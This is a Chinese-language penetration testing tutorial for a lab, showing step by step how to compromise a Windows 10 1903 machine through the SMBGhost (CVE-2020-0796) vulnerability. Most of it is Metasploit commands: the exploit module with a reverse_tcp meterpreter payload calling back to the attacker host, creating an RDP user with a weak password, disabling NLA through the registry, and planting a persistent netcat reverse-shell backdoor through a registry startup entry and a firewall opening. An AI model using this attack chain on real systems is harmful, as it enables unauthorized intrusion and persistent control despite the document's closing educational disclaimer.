掌握安全渗透测试：利用永恒之黑漏洞获取Windows 10系统访问权限

以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤：

环境介绍

• 靶机 ：IP地址为192.168.1.60，运行Windows 10 1903版本。
• 攻击机 ：IP地址为192.168.1.53。

靶机准备

1. 检查Windows 10版本号：确保靶机运行的Windows 10版本受到永恒之黑漏洞（CVE-2020-0796 SMBGhost）的影响。
2. 检查系统补丁 ：确认靶机未安装补丁KB4551762，该补丁修复了永恒之黑漏洞。
3. 开启445端口：确保靶机的445端口（SMB协议）是开放的。

获取Shell

1. 使用Metasploit框架：

   • 启动Metasploit：msfconsole。
   • 使用永恒之黑漏洞模块：use exploit/windows/smb/cve_2020_0796_smbghost。

2. 设置选项：

   • 显示模块选项：show options。
   • 设置目标主机IP：set RHOSTS 192.168.1.60。
   • 设置payload：set payload windows/x64/meterpreter/reverse_tcp。
   • 设置攻击机监听IP：set LHOST 192.168.1.53。
   • 禁用模拟模式：set DefangedMode false。

3. 执行exploit：

   • 运行exploit：exploit。

创建新用户并开启远程桌面

1. 开启RDP远程桌面：

   • 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务，并创建新用户。

2. 创建RDP用户：

   • 设置用户名和密码：set username xuegod 和 set password 123456。
   • 指定会话ID：set session 1。
   • 运行模块：run。

3. 检查NLA设置：

   • 查询注册表以确定是否开启网络级身份验证（NLA）。

4. 关闭NLA（如果开启）：

   • 修改注册表值SecurityLayer和UserAuthentication为0，以允许非NLA的RDP连接。

5. 连接远程桌面：

   • 在Kali上使用rdesktop命令连接到靶机的远程桌面：rdesktop 192.168.1.60。

开启后门维持权限访问

1. 配置后门程序：

   • 上传nc（Netcat）到Windows 10系统。
   • 修改注册表添加启动项，以便在系统启动时执行nc反弹shell命令。

2. 设置防火墙规则：

   • 允许443端口的网络访问，以使后门有效。

3. 重启Windows 10：

   • 重启靶机以应用更改，并等待后门程序运行。

4. 连接后门：

   • 在Kali上使用nc命令连接后门：nc -v 192.168.1.60 443。

5. MSF控制台连接（可选）：

   • 在Metasploit框架中使用connect命令连接到后门：connect 192.168.1.60 443。

总结

• 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤，包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意，这些步骤仅供教育目的，实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。